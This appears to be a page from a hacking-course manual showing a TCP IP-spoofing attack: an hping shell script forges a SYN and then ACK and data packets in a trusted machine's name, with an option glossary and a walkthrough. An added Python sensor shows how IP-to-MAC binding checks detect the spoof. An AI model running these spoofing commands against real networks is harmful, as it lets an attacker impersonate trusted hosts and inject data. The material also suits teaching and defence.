#!/bin/sh
# 1. Spoofed SYN (source address of machine C) towards machine B, sequence number 33
/usr/sbin/hping -a 192.168.0.2 -p 2222 -s 2110 -S -M 33 -c 1 192.168.0.66
# 2. Read the sequence number observed in B's SYN/ACK, incremented by 1
read u
# 3. Spoofed ACK completing the handshake, then a PSH/ACK carrying 6 bytes read from the file "data"
/usr/sbin/hping -a 192.168.0.2 -p 2222 -A -s 2110 -L $u -M 34 -c 1 192.168.0.66
/usr/sbin/hping -a 192.168.0.2 -p 2222 -A -s 2110 -L $u -P -M 34 -c 1 -d 6 -E data 192.168.0.66
To make things clearer, here are the options used in this script:
-a : Address of the spoofed machine (the source address written into the packet).
-p : Destination port of the packet.
-s : Source port used by the emitting machine.
-S : Sets the SYN flag.
-M : Sets the TCP sequence number sent by the emitting machine.
-c : Number of packets to send.
-A : Sets the ACK flag.
-L : Sets the acknowledgement number.
-P : Sets the PSH flag.
-d : Sets the size of the data sent.
-E : Reads the payload data from a file.
1. As seen previously, machine A sends a SYN packet to machine B, using of course the address of the (spoofed) machine C so that our packet is not dropped by machine B (and therefore left unprocessed).
2. With the help of Ethereal we recover the SYN/ACK packet that machine B sends back to machine C.
3. As ACK, we send back the sequence number chosen by machine B, incremented by 1.
Machine B: SEQ=1442628982 ------> Machine A Answer: ACK=1442628983
Let us have a look at Ethereal ... (figure 4)
We can note that we have the same combination SYN, SYN/ACK, ACK, typical of an authorized connection.
Bingo! The connection is now initialized.
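From a defender's side, the interesting point of this exchange is that the sequence and acknowledgement arithmetic is perfectly consistent, so machine B cannot tell the handshake apart from a genuine one; only the link-layer origin of the frames gives the spoof away. The following added example (not code from the original page) replays the exchange above as constructed packet records and runs a small sensor over them that tracks the handshake and checks each source IP against an inventory of IP-to-MAC bindings; the MAC addresses and the inventory are assumptions.

```python
from collections import namedtuple

Pkt = namedtuple("Pkt", "src dst mac flags seq ack")

# Constructed packet records modelled on the exchange above. Sequence and
# acknowledgement numbers are the page's; the MAC addresses are assumed, chosen
# so that the spoofed frames carry the emitting machine's hardware address.
TRACE = [
    Pkt("192.168.0.2", "192.168.0.66", "aa:aa:aa:aa:aa:0a", "S", 33, 0),            # spoofed SYN
    Pkt("192.168.0.66", "192.168.0.2", "bb:bb:bb:bb:bb:42", "SA", 1442628982, 34),  # genuine SYN/ACK
    Pkt("192.168.0.2", "192.168.0.66", "aa:aa:aa:aa:aa:0a", "A", 34, 1442628983),   # spoofed ACK
]

# Assumed inventory of legitimate IP -> MAC bindings on the segment.
BINDINGS = {"192.168.0.2": "cc:cc:cc:cc:cc:02", "192.168.0.66": "bb:bb:bb:bb:bb:42"}


def analyse(trace, bindings):
    """Return (alerts, handshakes): alerts raised and the final state per (client, server)."""
    alerts, handshakes = [], {}
    for i, p in enumerate(trace):
        # Check 1: does the frame's hardware address match the inventory for its source IP?
        expected = bindings.get(p.src)
        if expected and p.mac != expected:
            alerts.append(f"pkt{i}: {p.src} claimed by {p.mac}, inventory says {expected}")
        # Check 2: follow the three-way handshake and verify the SEQ/ACK arithmetic.
        if p.flags == "S":
            handshakes[(p.src, p.dst)] = {"client_isn": p.seq, "state": "SYN"}
        elif p.flags == "SA":
            hs = handshakes.get((p.dst, p.src))
            if hs is None:
                alerts.append(f"pkt{i}: SYN/ACK to {p.dst} without a preceding SYN")
            elif p.ack != hs["client_isn"] + 1:
                alerts.append(f"pkt{i}: SYN/ACK acks {p.ack}, expected {hs['client_isn'] + 1}")
            else:
                hs.update(server_isn=p.seq, state="SYN_ACK")
        elif p.flags == "A":
            hs = handshakes.get((p.src, p.dst))
            if hs and hs["state"] == "SYN_ACK":
                if p.ack == hs["server_isn"] + 1:
                    hs["state"] = "ESTABLISHED"   # arithmetic is valid: B accepts it
                else:
                    alerts.append(f"pkt{i}: ACK {p.ack} does not match SYN/ACK seq + 1")
    return alerts, handshakes


if __name__ == "__main__":
    found, states = analyse(TRACE, BINDINGS)
    print("\n".join(found) or "no alerts")
    print(states)
```

Without the binding inventory (pass an empty dict) the sensor raises nothing and reports the session as ESTABLISHED, which is exactly why a handshake-only view is blind to this technique.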
The Hackademy DMP -74/209- SYSDREAM